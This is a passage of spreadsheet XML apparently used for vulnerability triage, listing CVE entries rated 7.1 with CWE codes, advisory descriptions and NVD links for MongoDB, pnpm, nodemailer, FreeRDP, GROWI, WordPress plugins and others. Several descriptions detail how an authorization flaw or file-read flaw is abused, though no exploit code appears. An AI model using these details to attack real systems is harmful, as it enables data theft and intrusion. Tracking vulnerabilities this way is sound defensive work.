          <t>A security issue in MongoDB Server's diagnostic reporting interface allows an authenticated user with monitoring privileges to access insufficiently protected credentials from concurrent administrative operations. The same credentials are properly redacted in server log output, but the diagnostic interface omits equivalent redaction. Successful exploitation requires a valid authenticated session with monitoring-level permissions and results in exposure of cleartext credentials that could enable impersonation of other users, including privileged accounts.</t>
        </is>
      </c>
      <c r="M3262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="3263">
      <c r="A3263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="C3263" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3263" s="5" t="inlineStr"/>
      <c r="F3263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3263" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3263" s="5" t="inlineStr"/>
      <c r="I3263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3263" s="5" t="inlineStr"/>
      <c r="K3263" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3263" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="M3263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="3264">
      <c r="A3264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="C3264" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3264" s="5" t="inlineStr"/>
      <c r="F3264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3264" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3264" s="5" t="inlineStr"/>
      <c r="I3264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3264" s="5" t="inlineStr"/>
      <c r="K3264" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3264" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="M3264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="3265">
      <c r="A3265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="C3265" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3265" s="5" t="inlineStr"/>
      <c r="F3265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3265" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3265" s="5" t="inlineStr"/>
      <c r="I3265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3265" s="5" t="inlineStr"/>
      <c r="K3265" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3265" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M3265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="3266">
      <c r="A3266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82392</t>
        </is>
      </c>
      <c r="C3266" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3266" s="5" t="inlineStr"/>
      <c r="F3266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3266" s="5" t="inlineStr"/>
      <c r="H3266" s="5" t="inlineStr"/>
      <c r="I3266" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3266" s="5" t="inlineStr"/>
      <c r="K3266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3266" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and from 11.0.0 until 11.11.0, pnpm parses the package name from attacker-controlled pnpm-lock.yaml packages keys with dp.parse(depPath).name and uses it without validation in deps/graph-builder/src/lockfileToDepGraph.ts and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts. The name reaches path.join(modules, pkgName), storeController.importPackage, and pnpm11/lockfile/to-pnp/src/index.ts, allowing package contents to be written outside node_modules when a user runs pnpm install. When dangerouslyAllowAllBuilds or a matching allowBuilds entry permits lifecycle scripts, the escaped package can execute code with the user's privileges. This issue is fixed in versions 10.34.5 and 11.11.0.</t>
        </is>
      </c>
      <c r="M3266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82392</t>
        </is>
      </c>
    </row>
    <row r="3267">
      <c r="A3267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82634</t>
        </is>
      </c>
      <c r="C3267" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3267" s="5" t="inlineStr"/>
      <c r="F3267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3267" s="5" t="inlineStr"/>
      <c r="H3267" s="5" t="inlineStr"/>
      <c r="I3267" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J3267" s="5" t="inlineStr"/>
      <c r="K3267" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3267" s="5" t="inlineStr">
        <is>
          <t>Frappe Framework development builds contain an authorization flaw in the render_jinja_template endpoint that allows low-privileged users to render arbitrary Jinja templates by supplying raw template strings. Attackers with print permission on any document can execute arbitrary SELECT statements against unrelated tables, including reading password hashes from the __Auth table.</t>
        </is>
      </c>
      <c r="M3267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82634</t>
        </is>
      </c>
    </row>
    <row r="3268">
      <c r="A3268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82659</t>
        </is>
      </c>
      <c r="C3268" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3268" s="5" t="inlineStr"/>
      <c r="F3268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3268" s="5" t="inlineStr"/>
      <c r="H3268" s="5" t="inlineStr"/>
      <c r="I3268" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3268" s="5" t="inlineStr"/>
      <c r="K3268" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3268" s="5" t="inlineStr">
        <is>
          <t>nodemailer before 9.0.1 fails to apply disableFileAccess and disableUrlAccess flags to message-level raw option, allowing authenticated attackers to read arbitrary files or perform server-side request forgery by supplying path or href properties. Attackers can exploit this by crafting raw messages with file paths or URLs that bypass the intended sandbox, with fetched content delivered in the outgoing message to attacker-controlled recipients.</t>
        </is>
      </c>
      <c r="M3268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82659</t>
        </is>
      </c>
    </row>
    <row r="3269">
      <c r="A3269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82864</t>
        </is>
      </c>
      <c r="C3269" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3269" s="5" t="inlineStr"/>
      <c r="F3269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3269" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3269" s="5" t="inlineStr"/>
      <c r="I3269" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3269" s="5" t="inlineStr"/>
      <c r="K3269" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3269" s="5" t="inlineStr">
        <is>
          <t>pdfme pdf-lib versions before 5.5.10 contain an unbounded buffer growth vulnerability in the DecodeStream.ensureBuffer() method that allows attackers to cause denial of service by supplying a crafted PDF with a FlateDecode stream containing a decompression bomb. Attackers can upload a small compressed PDF that decompresses to hundreds of megabytes, exhausting memory and crashing the Node.js process or freezing browser tabs during PDF parsing.</t>
        </is>
      </c>
      <c r="M3269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82864</t>
        </is>
      </c>
    </row>
    <row r="3270">
      <c r="A3270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82872</t>
        </is>
      </c>
      <c r="C3270" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3270" s="5" t="inlineStr"/>
      <c r="F3270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3270" s="5" t="inlineStr"/>
      <c r="H3270" s="5" t="inlineStr"/>
      <c r="I3270" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3270" s="5" t="inlineStr"/>
      <c r="K3270" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3270" s="5" t="inlineStr">
        <is>
          <t>ToolJet before v3.16.208 fails to validate that the path organizationId matches the authenticated user's workspace before performing ToolJet DB table operations. A workspace admin can create, view, and delete database tables in another workspace by replacing the organizationId parameter in table-management API requests.</t>
        </is>
      </c>
      <c r="M3270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82872</t>
        </is>
      </c>
    </row>
    <row r="3271">
      <c r="A3271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82877</t>
        </is>
      </c>
      <c r="C3271" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3271" s="5" t="inlineStr"/>
      <c r="F3271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3271" s="5" t="inlineStr"/>
      <c r="H3271" s="5" t="inlineStr"/>
      <c r="I3271" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3271" s="5" t="inlineStr"/>
      <c r="K3271" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3271" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains an arbitrary file read vulnerability in the SOAP addFile method that allows authenticated users to read server files by supplying crafted XML with COPY-mode imports. Attackers can construct absolute file paths through an unsandboxed import directory and retrieve sensitive files including configuration files containing database credentials and setup passwords.</t>
        </is>
      </c>
      <c r="M3271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82877</t>
        </is>
      </c>
    </row>
    <row r="3272">
      <c r="A3272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83961</t>
        </is>
      </c>
      <c r="C3272" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3272" s="5" t="inlineStr"/>
      <c r="F3272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3272" s="5" t="inlineStr"/>
      <c r="H3272" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="I3272" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3272" s="5" t="inlineStr"/>
      <c r="K3272" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L3272" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain limited read and write access. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M3272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83961</t>
        </is>
      </c>
    </row>
    <row r="3273">
      <c r="A3273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84192</t>
        </is>
      </c>
      <c r="C3273" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3273" s="5" t="inlineStr"/>
      <c r="F3273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3273" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3273" s="5" t="inlineStr"/>
      <c r="I3273" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3273" s="5" t="inlineStr"/>
      <c r="K3273" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3273" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.3.1 contains a stored cross-site scripting vulnerability in legacy PHP templates that output SNMP-sourced and syslog-sourced data without escaping. An attacker who controls a monitored network device can inject arbitrary JavaScript through SNMP interface descriptions or syslog program fields that executes when authenticated users view affected pages.</t>
        </is>
      </c>
      <c r="M3273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84192</t>
        </is>
      </c>
    </row>
    <row r="3274">
      <c r="A3274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84204</t>
        </is>
      </c>
      <c r="C3274" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3274" s="5" t="inlineStr"/>
      <c r="F3274" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3274" s="5" t="inlineStr"/>
      <c r="H3274" s="5" t="inlineStr"/>
      <c r="I3274" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3274" s="5" t="inlineStr"/>
      <c r="K3274" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3274" s="5" t="inlineStr">
        <is>
          <t>GROWI contains an access control vulnerability in the GET /_api/v3/attachment/:id endpoint that fails to validate page access permissions. Authenticated attackers can retrieve attachment metadata from pages they cannot view by supplying known attachment identifiers.</t>
        </is>
      </c>
      <c r="M3274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84204</t>
        </is>
      </c>
    </row>
    <row r="3275">
      <c r="A3275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84205</t>
        </is>
      </c>
      <c r="C3275" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3275" s="5" t="inlineStr"/>
      <c r="F3275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3275" s="5" t="inlineStr"/>
      <c r="H3275" s="5" t="inlineStr"/>
      <c r="I3275" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3275" s="5" t="inlineStr"/>
      <c r="K3275" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3275" s="5" t="inlineStr">
        <is>
          <t>GROWI contains an access control vulnerability in the GET /_api/v3/revisions/:id endpoint that validates access against a query parameter but returns the revision identified by the path parameter without confirming they reference the same page. Authenticated attackers can pair a page identifier they can access with an arbitrary revision identifier to read revision content from pages they lack permission to view.</t>
        </is>
      </c>
      <c r="M3275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84205</t>
        </is>
      </c>
    </row>
    <row r="3276">
      <c r="A3276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84698</t>
        </is>
      </c>
      <c r="C3276" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3276" s="5" t="inlineStr"/>
      <c r="F3276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3276" s="5" t="inlineStr"/>
      <c r="H3276" s="5" t="inlineStr"/>
      <c r="I3276" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3276" s="5" t="inlineStr"/>
      <c r="K3276" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3276" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot contains a heap buffer overflow vulnerability in the sd_bench command that writes a four-byte block number into a user-supplied sized allocation. Attackers can invoke sd_bench with a block size below four bytes to overflow the heap buffer and potentially execute code or crash the system.</t>
        </is>
      </c>
      <c r="M3276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84698</t>
        </is>
      </c>
    </row>
    <row r="3277">
      <c r="A3277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84816</t>
        </is>
      </c>
      <c r="C3277" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3277" s="5" t="inlineStr"/>
      <c r="F3277" s="5" t="inlineStr"/>
      <c r="G3277" s="5" t="inlineStr"/>
      <c r="H3277" s="5" t="inlineStr"/>
      <c r="I3277" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3277" s="5" t="inlineStr"/>
      <c r="K3277" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3277" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPCS &lt;= 1.3.2 versions.</t>
        </is>
      </c>
      <c r="M3277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84816</t>
        </is>
      </c>
    </row>
    <row r="3278">
      <c r="A3278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84817</t>
        </is>
      </c>
      <c r="C3278" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3278" s="5" t="inlineStr"/>
      <c r="F3278" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3278" s="5" t="inlineStr"/>
      <c r="H3278" s="5" t="inlineStr"/>
      <c r="I3278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3278" s="5" t="inlineStr"/>
      <c r="K3278" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3278" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t>
        </is>
      </c>
      <c r="M3278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t>
        </is>
      </c>
    </row>
    <row r="3279">
      <c r="A3279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84818</t>
        </is>
      </c>
      <c r="C3279" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3279" s="5" t="inlineStr"/>
      <c r="F3279" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3279" s="5" t="inlineStr"/>
      <c r="H3279" s="5" t="inlineStr"/>
      <c r="I3279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3279" s="5" t="inlineStr"/>
      <c r="K3279" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3279" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t>
        </is>
      </c>
      <c r="M3279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t>
        </is>
      </c>
    </row>
    <row r="3280">
      <c r="A3280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84819</t>
        </is>
      </c>
      <c r="C3280" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3280" s="5" t="inlineStr"/>
      <c r="F3280" s="5" t="inlineStr"/>
      <c r="G3280" s="5" t="inlineStr"/>
      <c r="H3280" s="5" t="inlineStr"/>
      <c r="I3280" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3280" s="5" t="inlineStr"/>
      <c r="K3280" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3280" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPAdverts &lt;= 2.3.3 versions.</t>
        </is>
      </c>
      <c r="M3280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84819</t>
        </is>
      </c>
    </row>
    <row r="3281">
      <c r="A3281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84820</t>
        </is>
      </c>
      <c r="C3281" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3281" s="5" t="inlineStr"/>
      <c r="F3281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3281" s="5" t="inlineStr"/>
      <c r="H3281" s="5" t="inlineStr"/>
      <c r="I3281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3281" s="5" t="inlineStr"/>
      <c r="K3281" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3281" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t>
        </is>
      </c>
      <c r="M3281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t>
        </is>
      </c>
    </row>
    <row r="3282">
      <c r="A3282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84989</t>
        </is>
      </c>
      <c r="C3282" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3282" s="5" t="inlineStr"/>
      <c r="F3282" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3282" s="5" t="inlineStr"/>
      <c r="H3282" s="5" t="inlineStr"/>
      <c r="I3282" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3282" s="5" t="inlineStr"/>
      <c r="K3282" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3282" s="5" t="inlineStr">
        <is>
          <t>ntopng is a web-based network traffic monitoring application. In versions 6.7.0 through 6.7.260717, two REST v2 endpoints that manage ntopng's tag/badge feature — `POST /lua/rest/v2/delete/tag/tag.lua` and `POST /lua/rest/v2/edit/tag/tag.lua` — perform no authorization check at all. Any authenticated user, including a non-administrator ("unprivileged") account, can delete or rename any tag in the system, including tags created by an administrator. Version 6.7.260718 contains a fix.</t>
        </is>
      </c>
      <c r="M3282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84989</t>
        </is>
      </c>
    </row>
    <row r="3283">
      <c r="A3283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85089</t>
        </is>
      </c>
      <c r="C3283" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3283" s="5" t="inlineStr"/>
      <c r="F3283" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3283" s="5" t="inlineStr"/>
      <c r="H3283" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I3283" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3283" s="5" t="inlineStr"/>
      <c r="K3283" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3283" s="5" t="inlineStr">
        <is>
          <t>FreeRDP versions 3.0.0 through 3.30.0 (before 3.31.0) transmit uninitialized heap memory in Save Session Info PDU reserved padding fields. Three PDU writers in libfreerdp/core/info.c (rdp_write_logon_info_v2, rdp_write_logon_info_plain, and rdp_write_logon_info_ex) use Stream_Seek instead of Stream_Zero for reserved pad bytes (up to 576 bytes), leaving previously freed heap contents in the outgoing PDU. Because the send buffer is allocated with malloc (not zeroed), stale heap data — which may include cleartext credentials from prior sessions — can be sent to the receiving peer. FreeRDP-based servers using rdpUpdate::SaveSessionInfo and freerdp-proxy (which forwards these PDUs) are affected, allowing disclosure of server/proxy process memory to a downstream client.</t>
        </is>
      </c>
      <c r="M3283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85089</t>
        </is>
      </c>
    </row>
    <row r="3284">
      <c r="A3284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85093</t>
        </is>
      </c>
      <c r="C3284" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3284" s="5" t="inlineStr"/>
      <c r="F3284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3284" s="5" t="inlineStr"/>
      <c r="H3284" s="5" t="inlineStr"/>
      <c r="I3284" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3284" s="5" t="inlineStr"/>
      <c r="K3284" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3284" s="5" t="inlineStr">
        <is>
